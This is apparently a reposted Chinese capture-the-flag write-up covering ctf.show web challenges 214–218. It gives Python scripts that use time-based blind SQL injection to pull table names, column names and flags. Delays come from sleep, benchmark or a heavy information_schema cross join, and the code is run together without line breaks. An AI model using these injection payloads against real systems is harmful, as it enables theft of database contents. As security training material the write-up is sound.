当前位置: 首页 > ai >正文

ctfhow——web入门214~218(时间盲注开始)

ai 2025/7/14 8:58:24
web入门214

#@another:uwvwko
import requestsurl='http://b0c11589-31c9-4bf9-8b66-6b5a1fc08726.challenge.ctf.show/api/index.php'
flag=''
str='{-_1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}'for i in range(1,50):for j in str:# 查数据库# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"# 查列名字-id.flag# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"# 查数据payload = "select flaga from ctfshow_flagx"data ={'ip':f"if(substr(({payload}),{i},1)='{j}',sleep(3),0)",'debug':'1'}r=requests.post(url,data=data)if r.elapsed.total_seconds() > 2:flag+=jprint(flag)break

web入门215
#@uwvwko
import requests
import timeurl='http://17ae312d-8d89-42f7-b881-b9068c90093b.challenge.ctf.show/api/'flag=''str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'for i in range(1,60):for j in str:payload={#'ip':f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'{i}',1)={q},sleep(3),'False')#",#'ip':f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),'{i}',1)={q},sleep(3),'False')#",'ip': f"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{i},1)='{j}',sleep(3),'False')#",'debug': 0}r=requests.post(url,data=payload)if r.elapsed.total_seconds()>2:flag+=jprint(flag)break

(为啥有个A类)

web入门216

base64编码,但是我们可以直接用)来闭合

如:where id =from_base64(0)payload

脚本:

import requestsurl='http://c5791659-334c-48d2-833a-1f0c9fa90735.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''for j in range(1, 50):for k in str:# payload = {'debug':'0','ip':f"1)or if(substr(database(),{j},1)='{k}',sleep(3),0)#"}  # 猜数据库名# payload = {'debug': '0', 'ip': f"1)or if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名# payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名# payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxcc'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜列名payload = {'debug': '0', 'ip': f"1)or if(substr((select flagaac from ctfshow_flagxcc), {j}, 1) = '{k}',sleep(3),0)#"}  re = requests.post(url, data=payload)if re.elapsed.total_seconds() > 2:flag += kprint(flag)break

web入门217

毙了sleep

看了下大佬的payload,我们可以使用 benchmark,

benchmark(count,expr),重复执行 count 次 expr 表达式,使得处理时间很长

时间大概是3秒,然后开始写脚本

import requestsurl='http://4baeb3f2-07a1-438f-a1a6-6e984cf82339.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''for i in range(1, 60):for j in str:payload = {'debug': '1', # 'ip':f"if(substr(database(),{j},1)='{k}',benchmark(3000000,md5('myon')),0)"}  # 猜数据库名# 'ip': f"if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',benchmark(3000000,md5('12354')),0)"} # 'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',benchmark(3000000,md5('12345')),0)"}  # 'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxccb'), {j}, 1) = '{k}',benchmark(3000000,md5('123415')),0)"} 'ip': f"if(substr((select flagaabc from ctfshow_flagxccb), {i}, 1) = '{j}',benchmark(3000000,md5('12345')),0)"}r = requests.post(url, data=payload)if r.elapsed.total_seconds() > 2:flag += jprint(flag)break

web入门218

benchmark被禁了

脚本:

import requestsurl = 'http://04ce659f-5b93-475f-8526-203b887d0719.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''for i in range(0, 60):for j in str:payload = {'debug': '1', #'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database(),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"#'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"'ip': f"if(substr((select group_concat(flagaac) from ctfshow_flagxc),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"}r = requests.post(url, data=payload)if r.elapsed.total_seconds() > 0.4:flag += jprint(flag)break

(SELECT count(*) FROM information_schema.columns A, information_schema.columns B) 是一个时间延迟或资源消耗的操作,至于判断的时间要根据自己的电脑进行调试,显示出来的flag有可能会有误差

http://www.xdnf.cn/news/1687.html

相关文章:

  • 13-DevOps-引入容器编排Kubernetes
  • 使用vue2开发一个在线旅游预订平台-前端静态网站项目练习
  • 6.学习笔记-SpringMVC-拦截器(P71-P74)
  • 得物业务参数配置中心架构综述
  • 离线部署kubernetes
  • DeepSeek系列(7):行业专属应用
  • Unity后处理全解析:从入门到优化
  • 序论文42 | patch+MLP用于长序列预测
  • C语言教程(十四):C 语言指针详解
  • 倚光科技:微透镜阵列低成本加工新范式
  • 【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)
  • Linux基础命令
  • 容器修仙传 我的灵根是Pod 第10章 心魔大劫(RBAC与SecurityContext)
  • 免费版还是专业版?Dynadot 域名邮箱服务选择指南
  • 深度学习物理信息神经网络PINN+大模型辅助编程​
  • 如何在 Postman 中,自动获取 Token 并将其赋值到环境变量
  • 整平机:精密制造的“隐形守护者”
  • PCB封装主要组成元素
  • 10天学会嵌入式技术之51单片机-day-7
  • docker
  • 通付盾入选苏州市网络和数据安全免费体验目录,引领企业安全能力跃升
  • 智能小助手部署 Win10 + ollama的Deepseek + CentOS+ maxKB
  • C语言结构体和union内存对齐
  • 3.4/Q1,GBD数据库最新文章解读
  • 新增优惠券
  • 如何计算光伏电站的收益率
  • PyQt6基础_QProgressDialog
  • Discuz!+DeepSeek赋能虎跃办公:传统网址导航的智能进化之路
  • Python实例题:使用Pvthon3编写系列实用脚本
  • 【Java】jdk8安装——英文版